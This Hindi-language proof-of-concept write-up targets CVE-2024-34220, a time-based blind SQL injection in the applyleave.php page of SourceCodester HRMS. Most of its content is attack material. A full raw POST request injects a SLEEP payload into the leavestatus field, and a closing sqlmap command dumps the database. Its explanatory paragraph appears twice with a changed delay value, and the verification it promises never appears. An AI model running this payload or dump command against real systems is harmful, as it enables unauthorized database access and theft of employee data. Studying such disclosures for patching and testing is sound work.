
CVE-2024-34220 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो SourceCodester HRMS के applyleave.php में एक टाइम-बेस्ड ब्लाइंड SQL इंजेक्शन भेद्यता है, जिसमें डेटाबेस निष्कर्षण के लिए sqlmap स्वचालन शामिल है।
applyleave.php
SQL इंजेक्शन
हमलावर इस भेद्यता का दोहन करके डेटाबेस विशेषाधिकार प्राप्त कर सकते हैं, जिसके परिणामस्वरूप डेटाबेस में मौजूद बड़ी मात्रा में डेटा प्रभावित हो सकता है। यदि दूसरे पक्ष के डेटाबेस में DBA विशेषाधिकार हैं, तो इससे सर्वर होस्ट विशेषाधिकार प्राप्त हो सकते हैं।
POST /hrm/user/applyleave.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
Origin: http://localhost
Connection: close
Referer: http://localhost/hrm/user/applyleave.php
Cookie: PHPSESSID=2v2v2al4dkd4iir9cl5j7oikvr
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-PwnFox-Color: cyan
leavestatus=5'+AND+(SELECT+1337+FROM+(SELECT(SLEEP(5)))VSgR)+AND+'Kha'%3d'123&reason=+++&startdate=03%2F04%2F2024&enddate=29%2F04%2F2024&Apply=Submit
इस पेलोड को चलाने के बाद, डेटा लौटने में 5 सेकंड की देरी हो जाती है, यह दर्शाता है कि हमने संभवतः "sleep(5)" को सफलतापूर्वक निष्पादित कर लिया है। इस मामले में, विलंब कई गुना हो सकता है। हम इसे नीचे सत्यापित करेंगे:

इस पेलोड को चलाने के बाद, डेटा लौटने में 20 सेकंड की देरी हो जाती है, यह दर्शाता है कि हमने संभवतः "sleep(20)" को सफलतापूर्वक निष्पादित कर लिया है। इस मामले में, विलंब कई गुना हो सकता है। हम इसे नीचे सत्यापित करेंगे:

sqlmap -r <item request> --dump
